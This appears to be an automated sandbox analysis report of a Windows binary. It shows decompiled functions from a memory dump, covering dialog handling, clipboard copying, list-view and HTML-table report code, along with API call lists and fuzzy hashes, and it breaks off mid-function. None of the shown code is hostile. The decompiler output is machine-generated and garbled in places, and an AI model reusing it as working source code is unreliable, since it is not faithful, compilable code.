                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040335c
                                                                                                                                                      0x00403362
                                                                                                                                                      0x0040337c
                                                                                                                                                      0x0040337f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040338b
                                                                                                                                                      0x004033c0
                                                                                                                                                      0x004033d1
                                                                                                                                                      0x004033d9
                                                                                                                                                      0x004033d9
                                                                                                                                                      0x004033e4
                                                                                                                                                      0x004033ec
                                                                                                                                                      0x004033ec
                                                                                                                                                      0x004033f7
                                                                                                                                                      0x00403402
                                                                                                                                                      0x00403408
                                                                                                                                                      0x0040340f
                                                                                                                                                      0x0040341a
                                                                                                                                                      0x00403420
                                                                                                                                                      0x0040342c
                                                                                                                                                      0x00403433
                                                                                                                                                      0x00403433
                                                                                                                                                      0x0040343a
                                                                                                                                                      0x0040343e
                                                                                                                                                      0x00403448
                                                                                                                                                      0x00403448
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040344c
                                                                                                                                                      0x00403390
                                                                                                                                                      0x00403393
                                                                                                                                                      0x00403397
                                                                                                                                                      0x004033ba
                                                                                                                                                      0x004033bb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004033bb
                                                                                                                                                      0x00403399
                                                                                                                                                      0x0040339b
                                                                                                                                                      0x004033a0
                                                                                                                                                      0x004033a3
                                                                                                                                                      0x004033aa
                                                                                                                                                      0x004033af
                                                                                                                                                      0x004033b0
                                                                                                                                                      0x004033b5
                                                                                                                                                      0x004033b5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040336b
                                                                                                                                                      0x00403371
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403377
                                                                                                                                                      0x00403377
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403377
                                                                                                                                                      0x00403371

                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32 ref: 004033D7
                                                                                                                                                      • GetDlgItem.USER32 ref: 004033EA
                                                                                                                                                      • GetDlgItem.USER32 ref: 004033FF
                                                                                                                                                      • GetDlgItem.USER32 ref: 00403417
                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00403433
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00403448
                                                                                                                                                        • Part of subcall function 004030F2: GetDlgItem.USER32 ref: 00403100
                                                                                                                                                        • Part of subcall function 004030F2: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00403114
                                                                                                                                                      • SendDlgItemMessageW.USER32 ref: 00403460
                                                                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00403574
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Item$Dialog$MessageSend
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3975816621-0
                                                                                                                                                      • Opcode ID: b22570e3695d17f10ab55852422601c1b292fc17fc6dd051dca6e12d0d289d37
                                                                                                                                                      • Instruction ID: 6d0dc51428ca510c7a6a0451b1b353988afeb0acb98747cdfda1134de420bc82
                                                                                                                                                      • Opcode Fuzzy Hash: b22570e3695d17f10ab55852422601c1b292fc17fc6dd051dca6e12d0d289d37
                                                                                                                                                      • Instruction Fuzzy Hash: 3661A330200705ABDB329F25CC86E1ABBA9FF04315F00853EF911AB6E1D779AE50CB59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00403584, Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E00403584(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
				RECT* _v8;
				void* __esi;
				void* _t39;
				signed int _t41;
				void* _t42;
				struct HWND__* _t47;
				signed int _t53;
				void* _t54;
				signed int _t74;
				signed int _t76;
				void* _t78;
				void** _t80;
				signed int _t84;
				void* _t88;
				signed int _t89;

				_t78 = __edi;
				_push(0xc);
				_v8 = 0;
				 *((intOrPtr*)(__edi + 0x44)) = __eax;
				L0040E038();
				if(__eax == 0) {
					_t80 = 0;
				} else {
					 *((intOrPtr*)(__eax)) = 0;
					_t80 = __eax;
				}
				 *(_t78 + 0x40) = _t80;
				_t39 =  *_t80;
				_t88 = _t39;
				if(_t88 != 0) {
					_push(_t39);
					L0040E032();
					 *_t80 = 0;
				}
				_t80[2] = _a8;
				_t41 = E0040299A(_a8);
				_t74 = 4;
				_t80[1] = _t41;
				_t42 = _t41 * _t74;
				_push( ~(0 | _t88 > 0x00000000) | _t42);
				L0040E038();
				 *_t80 = _t42;
				memset(_t42, 0, _t80[1] << 2);
				E0040751C( *(_t78 + 0x40), ( *(_t78 + 0x40))[2]);
				_t89 =  *(_t78 + 0x44);
				if(_t89 == 0) {
					_t84 = ( *(_t78 + 0x40))[1];
					_t76 = 0x14;
					_t53 = _t84 * _t76;
					_push( ~(0 | _t89 > 0x00000000) | _t53);
					L0040E038();
					 *(_t78 + 0x44) = _t53;
					if(_t84 > 0) {
						_t54 = 0;
						do {
							 *((intOrPtr*)(_t54 +  *(_t78 + 0x44) + 0xc)) = 0x78;
							_t54 = _t54 + 0x14;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
					}
					_v8 = 1;
				}
				if(E0040152F(0x448, _t78, _a4) == 1) {
					E00407487( *(_t78 + 0x40), ( *(_t78 + 0x40))[2]);
					InvalidateRect(( *(_t78 + 0x40))[2], 0, 0);
				}
				_t47 = SetFocus(_a8);
				if(_v8 != 0) {
					_push( *(_t78 + 0x44));
					L0040E032();
					return _t47;
				}
				return _t47;
			}


















                                                                                                                                                      0x00403584
                                                                                                                                                      0x0040358c
                                                                                                                                                      0x0040358e
                                                                                                                                                      0x00403591
                                                                                                                                                      0x00403594
                                                                                                                                                      0x0040359c
                                                                                                                                                      0x004035a4
                                                                                                                                                      0x0040359e
                                                                                                                                                      0x0040359e
                                                                                                                                                      0x004035a0
                                                                                                                                                      0x004035a0
                                                                                                                                                      0x004035a6
                                                                                                                                                      0x004035a9
                                                                                                                                                      0x004035ab
                                                                                                                                                      0x004035ad
                                                                                                                                                      0x004035af
                                                                                                                                                      0x004035b0
                                                                                                                                                      0x004035b6
                                                                                                                                                      0x004035b6
                                                                                                                                                      0x004035bc
                                                                                                                                                      0x004035bf
                                                                                                                                                      0x004035c8
                                                                                                                                                      0x004035c9
                                                                                                                                                      0x004035cc
                                                                                                                                                      0x004035d5
                                                                                                                                                      0x004035d6
                                                                                                                                                      0x004035e4
                                                                                                                                                      0x004035e6
                                                                                                                                                      0x004035f4
                                                                                                                                                      0x004035f9
                                                                                                                                                      0x004035fc
                                                                                                                                                      0x00403601
                                                                                                                                                      0x00403608
                                                                                                                                                      0x0040360b
                                                                                                                                                      0x00403614
                                                                                                                                                      0x00403615
                                                                                                                                                      0x0040361d
                                                                                                                                                      0x00403620
                                                                                                                                                      0x00403622
                                                                                                                                                      0x00403624
                                                                                                                                                      0x00403627
                                                                                                                                                      0x0040362f
                                                                                                                                                      0x00403632
                                                                                                                                                      0x00403632
                                                                                                                                                      0x00403624
                                                                                                                                                      0x00403635
                                                                                                                                                      0x00403635
                                                                                                                                                      0x0040364d
                                                                                                                                                      0x00403655
                                                                                                                                                      0x00403662
                                                                                                                                                      0x00403662
                                                                                                                                                      0x0040366b
                                                                                                                                                      0x00403676
                                                                                                                                                      0x00403678
                                                                                                                                                      0x0040367b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403680
                                                                                                                                                      0x00403682

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2313361498-0
                                                                                                                                                      • Opcode ID: 24aef8737a6560aee288ce69192634901bd296d66f2a46c2a177e1884aa19c86
                                                                                                                                                      • Instruction ID: 3294c0e99436dff93e0626edbac004f6b09504e7bc31cfe1dcbb88acf09cb1a4
                                                                                                                                                      • Opcode Fuzzy Hash: 24aef8737a6560aee288ce69192634901bd296d66f2a46c2a177e1884aa19c86
                                                                                                                                                      • Instruction Fuzzy Hash: 3A3190B2501611BFDB249F69C94592ABBA8FF04354B04893EF605E76E0C77AEC108B54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004054F1, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E004054F1(void* _a4) {
				int _t7;
				signed int _t12;
				int _t14;
				void* _t18;
				signed int _t20;
				void* _t23;

				_t23 = _a4;
				_t20 = 0;
				EmptyClipboard();
				if(_t23 != 0) {
					_t7 = wcslen(_t23);
					_t3 = _t7 + 2; // 0x2
					_t14 = _t7 + _t3;
					_t18 = GlobalAlloc(0x2000, _t14);
					if(_t18 != 0) {
						memcpy(GlobalLock(_t18), _t23, _t14);
						GlobalUnlock(_t18);
						_t12 = SetClipboardData(0xd, _t18);
						asm("sbb esi, esi");
						_t20 =  ~( ~_t12);
					}
				}
				CloseClipboard();
				return _t20;
			}









                                                                                                                                                      0x004054f2
                                                                                                                                                      0x004054f7
                                                                                                                                                      0x004054f9
                                                                                                                                                      0x00405501
                                                                                                                                                      0x00405506
                                                                                                                                                      0x0040550c
                                                                                                                                                      0x0040550c
                                                                                                                                                      0x0040551c
                                                                                                                                                      0x00405520
                                                                                                                                                      0x0040552c
                                                                                                                                                      0x00405535
                                                                                                                                                      0x0040553e
                                                                                                                                                      0x00405548
                                                                                                                                                      0x0040554a
                                                                                                                                                      0x0040554a
                                                                                                                                                      0x0040554d
                                                                                                                                                      0x0040554e
                                                                                                                                                      0x00405558

                                                                                                                                                      APIs
                                                                                                                                                      • EmptyClipboard.USER32(?,?,0040AE96,00000000), ref: 004054F9
                                                                                                                                                      • wcslen.MSVCRT ref: 00405506
                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002,00000000,?,?,?,0040AE96,00000000), ref: 00405516
                                                                                                                                                      • GlobalLock.KERNEL32 ref: 00405523
                                                                                                                                                      • memcpy.MSVCRT ref: 0040552C
                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405535
                                                                                                                                                      • SetClipboardData.USER32 ref: 0040553E
                                                                                                                                                      • CloseClipboard.USER32 ref: 0040554E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1213725291-0
                                                                                                                                                      • Opcode ID: 3f23b09ed67182d54db4a1c9f3f8af9c1593430563a161df7ce732bfd0db5a6d
                                                                                                                                                      • Instruction ID: cbe089e464cab8641743a2df57c61d738c9647510a312ad91d4355c2b2932f4a
                                                                                                                                                      • Opcode Fuzzy Hash: 3f23b09ed67182d54db4a1c9f3f8af9c1593430563a161df7ce732bfd0db5a6d
                                                                                                                                                      • Instruction Fuzzy Hash: 94F0BB371003287BD23037B1ED4CD6B776CDB85B49B05013DF505F6652DA355C084AB9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004078E1, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 131COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E004078E1(intOrPtr* __eax, void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t75;
				signed int _t77;
				signed short _t86;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				signed short _t96;
				void* _t98;
				signed int _t126;
				signed int _t128;
				signed int _t130;
				intOrPtr* _t133;
				signed int _t137;
				signed int _t139;
				void* _t142;
				void* _t143;
				void* _t147;

				_t143 = __eflags;
				_push(__ecx);
				_push(__ecx);
				_t133 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x6c))();
				E0040768E(__eax);
				 *(_t133 + 0x40) =  *(_t133 + 0x40) & 0x00000000;
				_t137 = 0xb;
				 *((intOrPtr*)(_t133 + 0x2ac)) = _a4;
				_t126 = 0x14;
				_t75 = _t137 * _t126;
				 *(_t133 + 0x2e0) = _t137;
				_push( ~(0 | _t143 > 0x00000000) | _t75);
				L0040E038();
				 *(_t133 + 0x2e4) = _t75;
				_t128 = 0x14;
				_t77 = _t137 * _t128;
				_push( ~(0 | _t143 > 0x00000000) | _t77);
				L0040E038();
				_t98 = 0x4120c0;
				 *(_t133 + 0x48) = _t77;
				_v8 = 0x4120c0;
				do {
					_t139 =  *_t98 * 0x14;
					memcpy( *(_t133 + 0x2e4) + _t139, _t98, 0x14);
					_t24 = _t98 + 0x14; // 0x4120d4
					memcpy( *(_t133 + 0x48) + _t139, _t24, 0x14);
					_t86 =  *( *(_t133 + 0x2e4) + _t139 + 0x10);
					_t142 = _t142 + 0x18;
					_v12 = _t86;
					 *( *(_t133 + 0x48) + _t139 + 0x10) = _t86;
					if((_t86 & 0xffff0000) == 0) {
						 *( *(_t133 + 0x2e4) + _t139 + 0x10) = E00406827(_t86 & 0x0000ffff);
						_t96 = E00406827(_v12 | 0x00010000);
						_t98 = _v8;
						 *( *(_t133 + 0x48) + _t139 + 0x10) = _t96;
					}
					_t98 = _t98 + 0x28;
					_t147 = _t98 - 0x412278;
					_v8 = _t98;
				} while (_t147 < 0);
				 *(_t133 + 0x4c) =  *(_t133 + 0x4c) & 0x00000000;
				 *((intOrPtr*)(_t133 + 0x50)) = _a8;
				_t88 = 0xb;
				_t130 = 4;
				 *(_t133 + 0x34) = _t88;
				_t89 = _t88 * _t130;
				 *((intOrPtr*)(_t133 + 0x30)) = 0x20;
				_push( ~(0 | _t147 > 0x00000000) | _t89);
				L0040E038();
				_push(0xc);
				 *(_t133 + 0x38) = _t89;
				L0040E038();
				_t140 = _t89;
				if(_t89 == 0) {
					_t90 = 0;
					__eflags = 0;
				} else {
					_t90 = E00407440(_a4,  *((intOrPtr*)(_t133 + 0x60)), _t140);
				}
				 *((intOrPtr*)(_t133 + 0x2cc)) = _t90;
				 *((intOrPtr*)(_t133 + 0x54)) = 1;
				 *((intOrPtr*)(_t133 + 0x58)) = 0;
				 *((intOrPtr*)(_t133 + 0x2c0)) = 1;
				 *((intOrPtr*)(_t133 + 0x2c4)) = 0;
				 *((intOrPtr*)(_t133 + 0x2c8)) = 0;
				 *((intOrPtr*)(_t133 + 0x2d0)) = 1;
				 *((intOrPtr*)(_t133 + 0x2d4)) = 1;
				 *((intOrPtr*)(_t133 + 0x344)) = 0x32;
				 *((intOrPtr*)(_t133 + 0x64)) = 0xffffff;
				return E00407861(_t133);
			}

























                                                                                                                                                      0x004078e1
                                                                                                                                                      0x004078e4
                                                                                                                                                      0x004078e5
                                                                                                                                                      0x004078e9
                                                                                                                                                      0x004078f4
                                                                                                                                                      0x004078f7
                                                                                                                                                      0x004078ff
                                                                                                                                                      0x00407905
                                                                                                                                                      0x00407906
                                                                                                                                                      0x00407910
                                                                                                                                                      0x00407913
                                                                                                                                                      0x00407918
                                                                                                                                                      0x00407922
                                                                                                                                                      0x00407923
                                                                                                                                                      0x00407928
                                                                                                                                                      0x00407932
                                                                                                                                                      0x00407935
                                                                                                                                                      0x0040793e
                                                                                                                                                      0x0040793f
                                                                                                                                                      0x00407945
                                                                                                                                                      0x0040794b
                                                                                                                                                      0x0040794e
                                                                                                                                                      0x00407951
                                                                                                                                                      0x00407959
                                                                                                                                                      0x00407962
                                                                                                                                                      0x00407969
                                                                                                                                                      0x00407973
                                                                                                                                                      0x0040797e
                                                                                                                                                      0x00407985
                                                                                                                                                      0x0040798d
                                                                                                                                                      0x00407990
                                                                                                                                                      0x00407994
                                                                                                                                                      0x004079ad
                                                                                                                                                      0x004079b1
                                                                                                                                                      0x004079b9
                                                                                                                                                      0x004079bc
                                                                                                                                                      0x004079bc
                                                                                                                                                      0x004079c0
                                                                                                                                                      0x004079c3
                                                                                                                                                      0x004079c9
                                                                                                                                                      0x004079c9
                                                                                                                                                      0x004079d1
                                                                                                                                                      0x004079d7
                                                                                                                                                      0x004079da
                                                                                                                                                      0x004079df
                                                                                                                                                      0x004079e0
                                                                                                                                                      0x004079e3
                                                                                                                                                      0x004079e8
                                                                                                                                                      0x004079f3
                                                                                                                                                      0x004079f4
                                                                                                                                                      0x004079f9
                                                                                                                                                      0x004079fb
                                                                                                                                                      0x004079fe
                                                                                                                                                      0x00407a03
                                                                                                                                                      0x00407a09
                                                                                                                                                      0x00407a18
                                                                                                                                                      0x00407a18
                                                                                                                                                      0x00407a0b
                                                                                                                                                      0x00407a11
                                                                                                                                                      0x00407a11
                                                                                                                                                      0x00407a1a
                                                                                                                                                      0x00407a25
                                                                                                                                                      0x00407a28
                                                                                                                                                      0x00407a2b
                                                                                                                                                      0x00407a31
                                                                                                                                                      0x00407a37
                                                                                                                                                      0x00407a3d
                                                                                                                                                      0x00407a43
                                                                                                                                                      0x00407a49
                                                                                                                                                      0x00407a53
                                                                                                                                                      0x00407a63

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076A8
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076B9
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D0
                                                                                                                                                        • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D9
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00407923
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040793F
                                                                                                                                                      • memcpy.MSVCRT ref: 00407962
                                                                                                                                                      • memcpy.MSVCRT ref: 00407973
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004079F4
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004079FE
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                        • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                        • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                        • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                        • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                        • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                      • String ID: x"A
                                                                                                                                                      • API String ID: 975042529-63625180
                                                                                                                                                      • Opcode ID: 5e15de00d9b0122d9a525f1b9c652474aa833521780f625cb65b569559e88023
                                                                                                                                                      • Instruction ID: 8801afb4ace5fbedb5bd820c2c75847393e8be4378505899df7aece04ba2f2e1
                                                                                                                                                      • Opcode Fuzzy Hash: 5e15de00d9b0122d9a525f1b9c652474aa833521780f625cb65b569559e88023
                                                                                                                                                      • Instruction Fuzzy Hash: 79418DB2A01712AFD718DF3AD485B99BBA4BF04314F10422FE609DB2C1D775B8208B98
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004031BE, Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 49%
                                                                                                                                                      			E004031BE(intOrPtr _a4) {
				struct HWND__* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				short _v28;
				intOrPtr _v56;
				char* _v60;
				void* _v72;
				void _v582;
				char _v584;
				struct HWND__* _t52;
				intOrPtr* _t58;
				void* _t59;
				intOrPtr _t63;
				void* _t71;
				intOrPtr _t77;
				void* _t78;
				intOrPtr _t79;
				void* _t82;
				intOrPtr _t87;
				signed int _t89;
				short* _t90;
				void* _t92;
				void* _t93;

				_t87 = _a4;
				_t52 = GetDlgItem( *(_t87 + 0x10), 0x3e9);
				_v8 = _t52;
				SendMessageW(_t52, 0x1009, 0, 0);
				SendMessageW(_v8, 0x1036, 0, 0x26);
				do {
				} while (SendMessageW(_v8, 0x101c, 0, 0) != 0);
				_push(0xc8);
				_push(0);
				_push(0);
				_push(_v8);
				_t78 = 6;
				E00402842(0x40f454, _t78);
				_t58 =  *((intOrPtr*)(_t87 + 0x40));
				_t79 =  *((intOrPtr*)(_t58 + 4));
				_t77 =  *_t58;
				_t93 = _t92 + 0x10;
				_v24 = _t79;
				_v16 = 0;
				if(_t79 <= 0) {
					L10:
					_t59 = 2;
					E004027D3(_t59, _v8, 0, _t59);
					return SetFocus(_v8);
				} else {
					goto L3;
				}
				do {
					L3:
					_v12 = 0;
					_v20 = 0;
					do {
						_t89 = _v12 << 2;
						if( *((short*)(_t77 + _t89 + 2)) == _v16) {
							_v584 = 0;
							memset( &_v582, 0, 0x1fe);
							_t93 = _t93 + 0xc;
							_v60 =  &_v584;
							_v72 = 4;
							_v56 = 0xff;
							if(SendMessageW( *( *((intOrPtr*)(_a4 + 0x40)) + 8), 0x105f, _v12,  &_v72) != 0) {
								_push(0);
								_push(_v12);
								_push(0);
								_push(0);
								_push(0);
								_push(_v8);
								_t82 = 5;
								_t71 = E004028C5( &_v584, _t82);
								_t90 = _t89 + _t77;
								_t83 =  *_t90;
								_v28 =  *_t90;
								E00402CD0(_v8, _t71, 0 | _t83 > 0x00000000);
								_t93 = _t93 + 0x24;
								if(_v28 == 0) {
									 *_t90 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x44)) + _v20 + 0xc));
								}
							}
						}
						_v12 = _v12 + 1;
						_t63 = _v24;
						_v20 = _v20 + 0x14;
					} while (_v12 < _t63);
					_v16 = _v16 + 1;
				} while (_v16 < _t63);
				goto L10;
			}




























                                                                                                                                                      0x004031ca
                                                                                                                                                      0x004031d5
                                                                                                                                                      0x004031eb
                                                                                                                                                      0x004031ee
                                                                                                                                                      0x004031fb
                                                                                                                                                      0x004031fd
                                                                                                                                                      0x00403209
                                                                                                                                                      0x0040320d
                                                                                                                                                      0x00403212
                                                                                                                                                      0x00403213
                                                                                                                                                      0x00403214
                                                                                                                                                      0x0040321e
                                                                                                                                                      0x0040321f
                                                                                                                                                      0x00403224
                                                                                                                                                      0x00403227
                                                                                                                                                      0x0040322a
                                                                                                                                                      0x0040322c
                                                                                                                                                      0x00403231
                                                                                                                                                      0x00403234
                                                                                                                                                      0x00403237
                                                                                                                                                      0x00403313
                                                                                                                                                      0x00403315
                                                                                                                                                      0x0040331b
                                                                                                                                                      0x00403330
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040323d
                                                                                                                                                      0x0040323d
                                                                                                                                                      0x0040323d
                                                                                                                                                      0x00403240
                                                                                                                                                      0x00403243
                                                                                                                                                      0x00403246
                                                                                                                                                      0x00403251
                                                                                                                                                      0x00403264
                                                                                                                                                      0x0040326b
                                                                                                                                                      0x00403279
                                                                                                                                                      0x00403282
                                                                                                                                                      0x0040328c
                                                                                                                                                      0x00403299
                                                                                                                                                      0x004032a8
                                                                                                                                                      0x004032aa
                                                                                                                                                      0x004032ab
                                                                                                                                                      0x004032b4
                                                                                                                                                      0x004032b5
                                                                                                                                                      0x004032b6
                                                                                                                                                      0x004032b7
                                                                                                                                                      0x004032bc
                                                                                                                                                      0x004032bd
                                                                                                                                                      0x004032c2
                                                                                                                                                      0x004032c4
                                                                                                                                                      0x004032ce
                                                                                                                                                      0x004032d6
                                                                                                                                                      0x004032db
                                                                                                                                                      0x004032e1
                                                                                                                                                      0x004032f1
                                                                                                                                                      0x004032f1
                                                                                                                                                      0x004032e1
                                                                                                                                                      0x004032a8
                                                                                                                                                      0x004032f4
                                                                                                                                                      0x004032f7
                                                                                                                                                      0x004032fa
                                                                                                                                                      0x004032fe
                                                                                                                                                      0x00403307
                                                                                                                                                      0x0040330a
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32 ref: 004031D5
                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 004031EE
                                                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 004031FB
                                                                                                                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00403207
                                                                                                                                                      • memset.MSVCRT ref: 0040326B
                                                                                                                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 004032A0
                                                                                                                                                      • SetFocus.USER32(?), ref: 00403326
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                      • Opcode ID: ab58b64ca0b35e7ad8e6b708a6aaa6c08aba0ce3a91fa458086e11feb534d575
                                                                                                                                                      • Instruction ID: e5884d61c50a84840a295c8cd46100b63ab271327737e15352f16c4cecb35b78
                                                                                                                                                      • Opcode Fuzzy Hash: ab58b64ca0b35e7ad8e6b708a6aaa6c08aba0ce3a91fa458086e11feb534d575
                                                                                                                                                      • Instruction Fuzzy Hash: 46418A35900219BFDB20EF85CD89EAFBF78EF04354F1040AAF908B6291D3719A40DBA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00408AFA, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 62%
                                                                                                                                                      			E00408AFA(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t94;
				intOrPtr* _t97;
				void* _t99;
				void* _t101;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t101 = _t99 + 0x18;
				asm("movsw");
				E00408857(__ebx, 0, _a4, L"<tr>");
				_t94 = 0;
				if( *((intOrPtr*)(__ebx + 0x34)) > 0) {
					do {
